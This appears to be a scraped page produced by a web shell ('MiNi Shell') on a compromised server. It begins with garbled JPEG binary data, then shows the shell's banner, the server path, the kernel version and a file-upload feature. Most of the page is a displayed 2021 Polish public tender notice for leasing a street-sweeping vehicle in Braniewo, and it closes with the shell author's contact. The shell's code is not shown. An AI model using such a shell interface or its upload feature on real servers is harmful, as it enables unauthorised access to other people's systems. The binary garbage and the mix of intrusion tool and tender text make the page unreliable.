JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210812/0014721301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00147213 z dnia 2021-08-12</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa i zakup w formie leasingu operacyjnego fabrycznie nowego wielofunkcyjnego pojazdu do całorocznego utrzymania czystości <br/>na terenach zewnętrznych” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO BRANIEWO ZAKŁAD GOSPODARKI KOMUNALNEJ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZGK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170028200</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rzemieślnicza 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Braniewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">14-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">556442902</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zgkbraniewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgkbraniewo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa i zakup w formie leasingu operacyjnego fabrycznie nowego wielofunkcyjnego pojazdu do całorocznego utrzymania czystości <br/>na terenach zewnętrznych” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8804973f-fb5b-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00147213</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00136642/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 „Dostawa i zakup w formie leasingu operacyjnego fabrycznie nowego wielofunkcyjnego pojazdu do całorocznego utrzymania czystości na terenach zewnętrznych”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych <br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1.	administratorem danych pozyskanych w ramach i na potrzeby niniejszego postępowania o udzielenie zamówienia publicznego jest Gmina Miasta Braniewa – Zakład Gospodarki Komunalnej w Braniewie, ul. Rzemieślnicza 1, 14-500 Braniewo;<br/>2.	Kontakt z inspektorem ochrony danych osobowych pod adresem e-mail: iod@braniewo.pl;<br/>3.	Dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu wzięcia udziału w postępowaniu o udzielenie zamówienia publicznego, nr ZGK.271.1.2021.AJP<br/>4.	Odbiorcami danych osobowych Wykonawcy będą:<br/>1) organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania <br/>w oparciu o ustawę z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), dalej „ustawa Pzp”; <br/>5.	Dane osobowe Wykonawcy będą przechowywane przez okres wykonywania umowy – do momentu jej rozwiązania lub wygaśnięcia, ustalenia, dochodzenia lub obrony przed roszczeniami – do momentu przedawnienia roszczeń z tytułu umowy lub roszczeń związanych z przetwarzaniem danych osobowych albo do momentu wniesienia sprzeciwu, wypełnienia ciążących obowiązków prawnych - <br/>do momentu wygaśnięcia obowiązków przechowywania danych wynikających <br/>z przepisów prawa; <br/>6.	Obowiązek podania danych osobowych jest wymogiem ustawowym określonym <br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencją niepodania danych osobowych będzie brak możliwości udziału w postępowaniu o udzielenie zamówienia publicznego;<br/>7.	W odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8.	Wykonawca posiada prawo dostępu do danych osobowych oraz otrzymania ich kopii, poprawienia, usunięcia, ograniczenia przetwarzania, przenoszenia, wniesienia sprzeciwu wobec przetwarzania danych, wniesienia skargi do organu nadzorczego oraz do cofnięcia zgody na przetwarzanie danych osobowych <br/>w każdym czasie – jeśli przewidują to przepisy RODO i po spełnieniu przesłanek określonych w RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGK.271.1.2021.AJP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 380000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> III. OPIS PRZEDMIOTU ZAMÓWIENIA<br/><br/>3.1.	Przedmiotem zamówienia jest dostawa w formie leasingu operacyjnego jednego fabrycznie nowego wielofunkcyjnego pojazdu do całorocznego utrzymania czystości na terenach zewnętrznych – rok produkcji min 2020. Uwaga!: podwozie i zabudowa rok produkcji 2020. <br/>3.2.	Wykonawca będzie zobowiązany dostarczyć przedmiot zamówienia <br/>do siedziby Zamawiającego przy ul. Rzemieślniczej 1 w Braniewie <br/>(woj. warmińsko-mazurskie) na własny koszt w ustalonym przez strony dniu odbioru przedmiotu zamówienia. <br/>Uwaga! Termin dostawy jest jednym z kryteriów oceny ofert. <br/>3.3.	SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA: <br/>Parametry pojazdu: <br/>1)	rok produkcji min 2020 rok;<br/>2)	dopuszczalna masa całkowita 2500 kg.;<br/>3)	silnik spalinowy, chłodzący cieczą spełniający wymagania normy spalin Stage V lub wyżej;<br/>4)	moc silnika min 20 kW;<br/>5)	napęd hydrostatyczny na wszystkie koła;<br/>6)	układ hydrauliczny wyposażony w osobne pompy do układu jezdnego <br/>i napędu osprzętu;<br/>7)	wysokość pojazdu max 2000 mm;<br/>8)	szerokość pojazdu bez osprzętu max 1150 mm;<br/>9)	rozstaw osi max 1350 mm;<br/>10) rozmiar opon min 10 cali zapewniające niski nacisk na podłoże;<br/>11) zewnętrzny promień skrętu max. 3300 mm;<br/>12) napęd 4x4 hydrauliczny;<br/>13) pojazd wolnobieżny;<br/>14) budowa nośnika przegubowa;<br/>15) hamulec roboczy i postojowy bębnowy przedniej osi;<br/>16) zbiornik na olej hydrauliczny min 21 litrów, zbiornik na paliwo min. <br/>45 litrów;<br/>17) wyświetlacz pokazujący pozostałą ilość paliwa, prędkość obrotową silnika, temperaturę silnika, lampkę ostrzegawczą niskiego stanu oleju hydraulicznego i silnikowego;<br/>18) nowy akumulator;<br/>19) pojazd musi być wyposażony w wspomaganie kierownicy;<br/>20) wymagany certyfikat potwierdzający spełnienie norm PM 10 oraz PM 2.5;<br/>21) agregat zamiatający min 2 szczotkowy, napędzany hydraulicznie;<br/>22) minimalna szerokość zamiatania 1800 mm;<br/>23) kontrola prędkości obrotu szczotek z kabiny w zakresie 1-100 obr/min;<br/>24) regulacja szerokości zamiatania i położenia szczotek z kabiny;<br/>25) kanał ssący min 150 mm - max 170 mm;<br/>26) średnica szczotki min. 560 mm - max 700 mm;<br/>27) system zraszania każdej szczotki, min. dwie szczotki;<br/>28) kabina 1 osobowa, z centralnie umieszczonym siedzeniem kierowcy;<br/>29) osprzęt nośnika musi pochodzić od tego samego producenta z systemem szybkiego montażu akcesoriów;<br/>30) możliwość montażu dodatkowych akcesoriów jak:<br/>a)	szorowarka z odsysaniem wody;<br/>b)	kosiarka, kosiarka bijakowa<br/>c)	posypywarka;<br/>d)	pług wirnikowy;<br/>e)	szczotki do śniegu;<br/>f)	dodatkowego zbiornika na kosinę;<br/>g)	kosiarka i trymer do żywopłotów;<br/>h)	ostrze krawędziarki do trawników;<br/>i)	szufli przechylnej ogrodniczej<br/>31) kabina klimatyzowana i ogrzewana;<br/>32) drzwi po obu stronach kabiny;<br/>33) regulacja kolumny kierownicy;<br/>34) składane lusterka boczne;<br/>35) hałas generowany przez nośnik max. 81 dB (A) ( norma 2009/63/EC);<br/>36) drgania oddziałujące na ciało operatora (norma EN13059) max. 0,29 m/s2;<br/>37) fotel operatora zgodny z dyrektywą 78/764/EEC;<br/>38) kabina musi posiadać certyfikat ROPS zgodnie z dyrektywą 86/298/EWG;<br/>39) kabina musi być wyposażona w filtr powietrza;<br/>40) maszyna musi być wyposażona w układ regulacji masy podłączonego akcesorium;<br/>3.4.	Wymagane dokumenty jakie będzie zobowiązany dostarczyć Wykonawca wraz z przedmiotem zamówienia: <br/>1)	Faktura sprzedaży kompletnego pojazdu. <br/>2)	Instrukcja obsługi, eksploatacji i konserwacji zabudowy (w języku polskim). <br/>3)	Katalog części zamiennych dla podwozia i zabudowy (w języku polskim). <br/>4)	Książka gwarancyjna podwozia. <br/>5)	Książka gwarancyjna zabudowy. <br/>3.5.	Warunki dodatkowe: <br/>1)	Dostarczony przez Wykonawcę pojazd musi mieć możliwość zamontowania (bez utraty gwarancji) stosowanego u Zamawiającego systemu monitorowania pojazdu – GPS. <br/>2)	Koszty dostarczenia nowego pojazdu do siedziby Zamawiającego obciążają Wykonawcę. <br/>3)	Wykonawca w dniu odbioru musi przeszkolić czterech pracowników Zamawiającego w zakresie prawidłowej eksploatacji i obsługi kompletnego pojazdu oraz wystawić zaświadczenia o ukończeniu przeszkolenia. <br/>4)	Wykonawca w trakcie trwania gwarancji w terminie uzgodnionym <br/>z Zamawiającym musi przeszkolić czterech pracowników Zamawiającego <br/>w zakresie diagnostyki i napraw pogwarancyjnych całego pojazdu (podwozia i zabudowy) oraz dostarczyć potrzebną dokumentację serwisową w zakresie diagnostyki i napraw jak również wystawić zaświadczenia o ukończeniu przeszkolenia.<br/>3.6.	Warunki gwarancji i serwisu: <br/>1)	Wykonawca zapewni udzielenie rękojmi oraz pełnej gwarancji jakości <br/>na cały przedmiot zamówienia (tj. podwozie oraz zabudowę) na okres minimum 24 miesięcy. <br/>2)	Okres gwarancji biegnie od dnia protokolarnego przekazania Zamawiającemu przedmiotu zamówienia. <br/>3)	Uprawnienia z tytułu rękojmi za wady przedmiotu zamówienia przysługują Zamawiającemu niezależnie od uprawnień z tytułu gwarancji, przy czym okres rękojmi zrównany zostaje z okresem gwarancji. Wszelkie odmienne postanowienia wynikające z kart gwarancyjnych uważa się za bezskuteczne. <br/>4)	Zmawiający wymaga dostępności autoryzowanego punktu naprawczego – serwisu dla podwozia w promieniu maksymalnie 100 km od siedziby Zamawiającego. <br/>5)	Zmawiający wymaga dostępności autoryzowanego punktu naprawczego – serwisu dla zabudowy w promieniu maksymalnie <br/>100 km od siedziby Zamawiającego. W sytuacji, gdy pojazd (podwozie) zostanie unieruchomiony w skutek awarii, koszt transportu <br/>do autoryzowanego punktu naprawczego – serwisu poniesie Wykonawca. Uwaga! Do oferty Wykonawca zobowiązany załączyć jest wykaz punktów naprawczych serwisów – w zakresie podwozia i zabudowy. <br/>6)	Gwarancja obejmuje: <br/>a)	przeglądy gwarancyjne zapewniające bezusterkową eksploatację <br/>w okresie udzielonej gwarancji, <br/>b)	koszt przeglądów gwarancyjnych ponosi Wykonawca (naprawy wraz z ewentualnym transportem, dojazdami, robocizną, wymiany części zamiennych wyłącznie na fabrycznie nowe, wymiany części eksploatacyjnych, olejów oraz filtrów), <br/>c)	usuwanie wszelkich wad i usterek ujawnionych w okresie gwarancji, <br/>d)	czas wykonania przeglądu w okresie gwarancyjnym, wynosi <br/>do dwóch dni roboczych, <br/>e)	czas fizycznej reakcji serwisu zabudowy (tj. przyjazd <br/>na miejsce awarii) do 48 godzin od daty zgłoszenia awarii w dni robocze, <br/>f)	czas przystąpienia do działań związanych z usuwaniem awarii w okresie gwarancji wynosi maksymalnie 48 godziny w dni robocze, <br/>g)	czas związany z usunięciem awarii wynosi maksymalnie do 7 dni roboczych, <br/>h)	w przypadku przedłużenia czasu usunięcia awarii powodującej wyłączenie przedmiotu zamówienia z użytkowania ponad okresy wymienione powyżej, Wykonawca zobowiązany jest <br/>do dostarczenia na własny koszt pojazdu zastępczego <br/>o parametrach tożsamych z przedmiotem zamówienia, do czasu usunięcia awarii przez serwis Wykonawcy, <br/>i)	okres gwarancji przedłuża się każdorazowo o liczbę dni niesprawności przedmiotu umowy spowodowanej awarią i czasem naprawy, <br/>j)	w okresie gwarancji koszt dojazdu serwisu lub transport przedmiotu zamówienia do punktu serwisowego ponosi Wykonawca,<br/>k)	Serwis pogwarancyjny – okres zagwarantowania dostępności części zamiennych i wyposażenia (zarówno dla podwozia jak <br/>i zabudowy) – minimum 10 lat od dnia dostawy przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144430-1 - Pojazdy do zamiatania dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66114000-2 - Usługi leasingu finansowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">63 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt. IV SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenie o niepodleganiu wykluczeniu, stanowiące załącznik nr 3 do SWZ,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">b)	oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące załącznik nr 4 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> załącznik nr 1 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-07 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-12 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com